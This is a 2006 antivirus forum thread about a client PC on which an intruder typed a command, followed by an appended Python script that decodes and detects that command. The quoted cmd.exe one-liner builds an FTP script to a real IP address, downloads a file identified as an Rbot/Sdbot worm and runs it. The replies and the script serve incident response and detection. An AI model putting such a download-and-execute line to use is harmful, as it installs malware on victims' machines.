Author Topic: suspicious activity  (Read 10039 times)


tgignac

  • Guest
suspicious activity
« on: November 04, 2006, 02:10:58 AM »
One of my client machines which is running avast from my ADNM had something weird happen to it today.
 
While I was working on it, the start menu and run command opened and the following command was entered into it:
 
"cmd.exe /c del i&echo open 24.220.147.205 16803 > i&echo user 1 1 >> i &echo get 886.exe >> i &echo quit >> i &ftp -n -s:i &886.exe&del i&exit"
 
So my suspicion took me a bit further to go download this file named 886.exe using a development machine. It seems that this file contains what SOPHOS calls a W32/Rbot-ARZ virus.
 
Anyways, I tried e-mailing it to my account and it was blocked by our outside mail scanner messagelabs and they called it W32/Sdbot.worm.gen.ax
 
Fortunately this was not downloaded. However, I am curious as to what was running this command and how compromised this system actually is.
 
I immediately ran hijackthis to get a record of what was running and then attempted to clean the system with adaware, and spybot s&d. They both found nothing exciting...

This is the hijackthis log file...

Logfile of HijackThis v1.99.1
Scan saved at 4:07:21 PM, on 11/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\acs.exe
C:\Acer\eManager\anbmServ.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\Program Files\Alwil Software\Avast4\AvAgent.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\OpenVPN\bin\openvpnserv.exe
C:\Program Files\OpenVPN\bin\openvpn.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\Program Files\Alwil Software\Avast4\aswWebSv.exe
C:\Program Files\Atheros\ACU.exe
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Documents and Settings\aflemming\Desktop\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.easthants.ca/chambers/bin/login.cgi
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 192.168.11.4:3128
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O4 - HKLM\..\Run: [ACU] "C:\Program Files\Atheros\ACU.exe" -nogui
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
O4 - HKLM\..\Run: [OrderReminder] C:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1131026867191
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1131027160060
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = easthants.ca
O17 - HKLM\Software\..\Telephony: DomainName = easthants.ca
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = easthants.ca
O23 - Service: Atheros Configuration Service (ACS) - Unknown owner - C:\WINDOWS\System32\acs.exe
O23 - Service: Notebook Manager Service (anbmService) - OSA Technologies Inc. - C:\Acer\eManager\anbmServ.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (file missing)
O23 - Service: avast! NetAgent - Unknown owner - C:\Program Files\Alwil Software\Avast4\AvAgent.exe" /ServiceStart (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswWebSv.exe" /service (file missing)
O23 - Service: OpenVPN Service (OpenVPNService) - Unknown owner - C:\Program Files\OpenVPN\bin\openvpnserv.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Any ideas?
How compromised is this system?

mauserme

  • Guest
Re: suspicious activity
« Reply #1 on: November 05, 2006, 01:42:52 AM »
What version of RealVNC do you have?  There is a security flaw in the way v4.1.1 authenticates clients that can allow your system to be compromised.

You might want to have a look at this thread

http://forum.avast.com/index.php?topic=23660.0


EDIT:  btw, Java is currently at 1.5.0_09, but that's probably not the cause of your current difficulty.
« Last Edit: November 05, 2006, 06:17:16 AM by mauserme »

tgignac

  • Guest
Re: suspicious activity
« Reply #2 on: November 05, 2006, 05:42:24 PM »
I'm using the enterprise version of VNC.

mauserme

  • Guest
Re: suspicious activity
« Reply #3 on: November 05, 2006, 06:27:06 PM »
I'm not sure if this statement

"This issue is corrected in RealVNC version 4.1.2, RealVNC Personal Edition 4.2.3, and RealVNC Enterprise Edition 4.2.3. Refer to the RealVNC Downloads site to get a patched version."

means the enterprise edition was also vulnerable but it certainly implies so.  The full text is here http://www.kb.cert.org/vuls/id/117929

Other than RealVNC I'm not seeing anything I would question in your hijackthis log but others on the forum with more hijackthis experience may see something I haven't.  In any event I still think you should check your revision number.

tgignac

  • Guest
Re: suspicious activity
« Reply #4 on: November 08, 2006, 03:59:59 PM »
yeah... it's enterprise version 4.2.6.8. I rolled it out as soon as the security alert was released.

I'm just wondering how the start -> run and then that command got posted in the gui like that... is it possible to script keystrokes and crap like that? If so, how do I find the script that was running the keystrokes to open the run command and put that ftp script in there?

That's what really makes me nervous.

mauserme

  • Guest
Re: suspicious activity
« Reply #5 on: November 09, 2006, 02:12:43 PM »
Yes, but I'm still at a loss as to what's going on.

Looking back at the hijackthis log I have a few questions and comments:

-- Did you post the entire log?

-- Are you using any software firewall?  I see none listed so either you have none, you're relying on the Windows Firewall or you have a third party firewall that's been disabled.

-- In the O23 section several of the avast! and one of the RealVNC files are shown as missing.

For now I would do this:

-- Repair your avast! installation through Add or Remove Programs or, if this doesn't work, uninstall and reinstall.  Probably your ADNM too.

-- Reinstall RealVNC

-- Reinstall your firewall (or get one if you don't have any)

-- Run an avast! boot scan

-- Download and scan with A-Squared

http://www.emsisoft.com/en/software/free/

-- Download and scan with SuperAntispyware

http://www.superantispyware.com/

One more question.  When you noticed the commands you first posted being issued how were you able to read it?  I mean, did it flash by in an instant or was it more like it was being typed in real time?

Offline DavidR

  • Avast Überevangelist
Re: suspicious activity
« Reply #6 on: November 09, 2006, 02:20:52 PM »
Quote from: mauserme
- In the O23 section several of the avast! and one of the RealVNC files are shown as missing.
This is a well known flaw in the current version of HJT.

Ignore any O23 reference to avast processes, this is a hiccup in HJT 1.99.1 (especially the missing file entry for avast); if you look at the supposed missing files, you wouldn't be able to scan your mail or web content and you would notice that, and most of all if ashServ.exe was missing there would be no scanning at all as that is the main scanning engine...
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

mauserme

  • Guest
Re: suspicious activity
« Reply #7 on: November 09, 2006, 02:47:41 PM »
Thanks David.

I'm wondering, though, since aswMaiSv.exe is also not listed in the Running Processes if this might be worth looking at.

Offline DavidR

  • Avast Überevangelist
Re: suspicious activity
« Reply #8 on: November 09, 2006, 04:01:08 PM »
Nothing wrong with looking, but I doubt it is missing, I didn't check the running processes for those not listed.

Having looked at the log again Java is also out of date.
You need to update Sun Java as the version you are running is out of date. Get the latest version, and once you have done this, uninstall all older versions from Control Panel > Add/Remove Programs.

http://www.java.com/en/download/index.jsp

Offline Lisandro

  • Avast team
Re: suspicious activity
« Reply #9 on: November 10, 2006, 01:21:36 AM »
I'm wondering, though, since aswMaiSv.exe is also not listed in the Running Processes if this might be worth looking at.
It is manually started when you check mail (it's a Windows Service).
But it is not killed after that, just remains in background, active, but not consuming resources.
Did you download emails at least once before looking at Task Manager?
Also it runs at the NT AUTHORITY\SYSTEM account level. Are you seeing processes from ALL users or just yours?
The best things in life are free.

mauserme

  • Guest
Re: suspicious activity
« Reply #10 on: November 10, 2006, 05:52:46 AM »
It is manually started when you check mail (it's a Windows Service).
OK - that makes sense  8)

tgignac

  • Guest
Re: suspicious activity
« Reply #11 on: November 10, 2006, 08:55:07 PM »
It's funny when the command was being typed in.... And I caught it by accident.. I was vnc'd in checking an e-mail issue my user was having... He was home and connected by secure VPN. They only have windows firewall enabled as they are all behind hardware firewalls.

Anyways, while I was remoted in, I saw the start menu pop up, and then the run command loaded. There was no mouse activity so it must have been controlled by key commands.... anyways, I saw the command I posted above start to be entered into the run line. I was running an instance of notepad at the same time and clicked the notepad app to bring it to the foreground and the command continued to be typed out in my notepad document.

I then copied the first few commands in the run line and pasted it into the notepad to ensure I had the full command.

It is above...

I did update Java after noticing that, thanks.
« Last Edit: November 10, 2006, 09:02:18 PM by tgignac »

mauserme

  • Guest
Re: suspicious activity
« Reply #12 on: November 11, 2006, 03:51:04 PM »
It's funny when the command was being typed in.... And I caught it by accident.. I was vnc'd in checking an e-mail issue my user was having...

Well, it seems like you weren't alone.

While it's possible there's a backdoor or remote tool on your computer I don't see this as the most likely problem.  Still, you should run the scans I mentioned above to check this.

More likely, maybe, are one of the following (some of these assume you're in a business environment):

-- User ID and password(s) were stolen by an attacker before you patched RealVNC or through other means such as a user leaving a list of passwords in plain view on a desk

-- Access was gained through an active session that was left unattended, say while an employee working from home took a break from the computer (I don't mean to speak badly of people but the reality is the attack came from somewhere)

-- An ex-employee's credentials have not been revoked

-- An active employee who feels he has an axe to grind is trying to wreak a little havoc

-- There could be an insecure wireless device in the network, possibly in an employee's home.

-- A new, unidentified, RealVNC vulnerability exists (not too likely; just looking at the possibilities)

Because you had the unique experience of watching the attack in progress you do have a tool normally not available.  The IP address you noted above is, potentially, that of the attacker.  It resolves to a cable provider in the Dakotas of the United States named Midcontinent Communications.  Here's a link to the home page

http://www.midcocomm.com/

In addition to contacting them to report the incident you should require all valid users to change their IDs and passwords, and review all credentials to make sure there are none still valid for people who might have left the company.

Regarding the firewall, the one native to Windows and your appliance provide inbound protection but not outbound.  There are many free ones available for home use but you might violate the terms of the license with these in your environment.  In your situation, however, I would probably test one or two of the free ones for compatibility with an intent to purchase.  This might help get things under control and I'm sure for short term evaluation purposes the vendor would understand.

You also need to search your computer for the presence of a file named i.  Do the search with i enclosed in quotes ("i") - otherwise you will get a list of every file containing i in the name.  The reason for this search is the method the attacker was using.  If I'm reading the commands correctly the attacker was writing a text file named i to contain batched ftp commands.  An ftp session would then have been opened and 886.exe would be transferred.  After running 886.exe, i would have been deleted and the command window would have closed.  Since you interrupted this process there is a possibility that i exists on your hard drive with some or all of the ftp commands.  In this situation I would archive i to a cd in case you need documentation of the attack and delete it from the hard drive.

Please post the results of the scans when you get a chance.

EDIT:  If you do find a file named i you can safely read its contents before deleting it in a command window with the command "type i" leaving off the quotes.
« Last Edit: November 11, 2006, 03:55:09 PM by mauserme »
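The one-liner quoted in the first post, and the mechanism mauserme walks through in Reply #12 (a series of echo redirections building a script file i, ftp -n -s:i consuming it, the fetched 886.exe being run, then i deleted), can be decoded mechanically. The Python below is an added example; it is not code from the thread or from any tool mentioned in it. Only the command line itself is taken from the first post; the sample process-command-line entries and the "recovered" partial i file are constructed for illustration. It replays the echo redirections to reconstruct i, pulls out the FTP server, port, credentials and payload name, flags the same download-and-execute shape in arbitrary command lines (for example from process-creation auditing), and compares a recovered i with what the chain would have written, which tells you how far an interrupted run got.

```python
"""Decode a cmd.exe FTP download-and-execute one-liner and triage the script
file it leaves behind.  Added example, not code from the thread or from any
tool named in it; only OBSERVED comes from the first post, the log samples and
the partial script are constructed."""
import re

# The command the original poster watched being typed (quoted from the thread).
OBSERVED = ("cmd.exe /c del i&echo open 24.220.147.205 16803 > i&echo user 1 1 >> i "
            "&echo get 886.exe >> i &echo quit >> i &ftp -n -s:i &886.exe&del i&exit")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)   # echo TEXT > FILE / >> FILE
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)                  # ftp -n -s:SCRIPT
CMD_C_RE = re.compile(r".*?\bcmd(?:\.exe)?\"?\s+/c\s+", re.I)    # optional 'cmd.exe /c' prefix


def split_chain(cmdline):
    """Split 'cmd.exe /c a&b&c' into the commands cmd.exe runs, in order.
    Plain '&' only; '&&', '||' and quoted '&' are not handled."""
    m = CMD_C_RE.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    return [p.strip() for p in body.split("&") if p.strip()]


def replay_echo_writes(commands):
    """Reproduce the files the 'echo ... > f' / 'echo ... >> f' steps create.
    Real cmd.exe keeps the space before the redirect and writes CRLF; the text
    is normalised here, so compare with on-disk content using rstrip()."""
    files = {}
    for cmd in commands:
        m = ECHO_RE.match(cmd)
        if not m:
            continue
        text, op, fname = m.groups()
        if op == ">":                      # '>' truncates, '>>' appends
            files[fname] = ""
        files[fname] = files.get(fname, "") + text + "\n"
    return files


def decode(cmdline):
    """Indicators a responder wants: source server, credentials, what is
    fetched, what is executed, and whether the chain cleans up after itself."""
    cmds = split_chain(cmdline)
    files = replay_echo_writes(cmds)
    info = {"commands": cmds, "files": files, "script_file": None,
            "host": None, "port": None, "user": None, "password": None,
            "fetched": [], "executed": [], "deletes_script": False}
    ftp_idx = next((i for i, c in enumerate(cmds) if FTP_RE.match(c)), None)
    if ftp_idx is None:
        return info
    script = FTP_RE.match(cmds[ftp_idx]).group(1)
    info["script_file"] = script
    # Interpret the ftp script: open HOST [PORT], user NAME [PASS], get FILE.
    for line in files.get(script, "").splitlines():
        w = line.split()
        if not w:
            continue
        verb = w[0].lower()
        if verb == "open" and len(w) >= 2:
            info["host"] = w[1]
            info["port"] = int(w[2]) if len(w) > 2 and w[2].isdigit() else 21
        elif verb == "user" and len(w) >= 2:
            info["user"] = w[1]
            info["password"] = w[2] if len(w) > 2 else None
        elif verb in ("get", "mget") and len(w) >= 2:
            info["fetched"].append(w[1])
    # Anything after the ftp step that names a fetched file is the execution step.
    for c in cmds[ftp_idx + 1:]:
        if c in info["fetched"]:
            info["executed"].append(c)
        if c.lower() == ("del " + script).lower():
            info["deletes_script"] = True
    return info


def is_ftp_dropper(cmdline):
    """Detection rule: an echo-built ftp script is fed to 'ftp -s:' and a file
    that script fetched is then executed."""
    d = decode(cmdline)
    return bool(d["host"] and d["fetched"] and d["executed"])


def stage_reached(cmdline, recovered_text):
    """Compare a script file found on disk with the one the chain would have
    written.  Returns (lines_present, lines_expected): all present means the
    ftp step was reached, fewer means the chain was cut off while building it."""
    d = decode(cmdline)
    expected = [l.rstrip() for l in d["files"].get(d["script_file"], "").splitlines()]
    got = [l.rstrip() for l in recovered_text.splitlines()]
    n = 0
    for e, g in zip(expected, got):
        if e != g:
            break
        n += 1
    return n, len(expected)


# Constructed process-command-line samples (not real log data).
SAMPLE_PROCESS_LOG = [r"C:\WINDOWS\system32\cmd.exe /c dir C:\temp", OBSERVED,
                      r"cmd.exe /c echo hello > note.txt"]

if __name__ == "__main__":
    d = decode(OBSERVED)
    print("script file :", d["script_file"], repr(d["files"][d["script_file"]]))
    print("ftp server  :", d["host"], d["port"], "creds:", d["user"], "/", d["password"])
    print("fetched/exec:", d["fetched"], d["executed"], "cleanup:", d["deletes_script"])
    for line in SAMPLE_PROCESS_LOG:
        print("DROPPER" if is_ftp_dropper(line) else "ok     ", line[:60])
    # Constructed 'i' as it might look if the chain was interrupted after two echoes.
    print("stage reached:", stage_reached(OBSERVED, "open 24.220.147.205 16803 \r\nuser 1 1 \r\n"))
```

Run as-is it prints the decoded indicators for the observed command; feeding is_ftp_dropper the command lines from process-creation auditing finds the same shape on other hosts. The stage_reached result is the answer to the "how compromised" question: a full four-line i means the ftp step was at least started and 886.exe should be looked for, a shorter one means the interruption came before any download.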